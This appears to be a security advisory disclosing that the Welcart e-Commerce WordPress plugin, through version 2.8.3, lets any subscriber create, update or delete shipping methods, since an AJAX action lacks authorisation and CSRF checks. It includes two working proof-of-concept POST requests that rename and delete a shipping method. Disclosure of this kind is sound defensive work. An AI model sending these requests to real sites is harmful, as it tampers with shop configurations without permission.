Welcart e-Commerce by Collne Inc.

The plugin does not have authorisation and Cross-Site Request Forgery (CSRF) check in an AJAX action, allowing any logged-in user to create, update and delete shipping methods.

Proof of Concept

Update shipping method name (#0 shipping method id) exploit:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=shop_options_ajax&mode=update_delivery_method&name=UPDATE&id=0&time=&charge=-1&days=-1&nocod=0&intl=0&cool_category=0

Delete shipping method (#0 shipping method id) exploit:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=shop_options_ajax&mode=delete_delivery_method&id=0

Welcart e-Commerce by Collne Inc. <= 2.8.3 - Subscriber+ Arbitrary Shipping Method Creation/Update/Deletion

Proof of Concept

References

Attributes

Classification

Researcher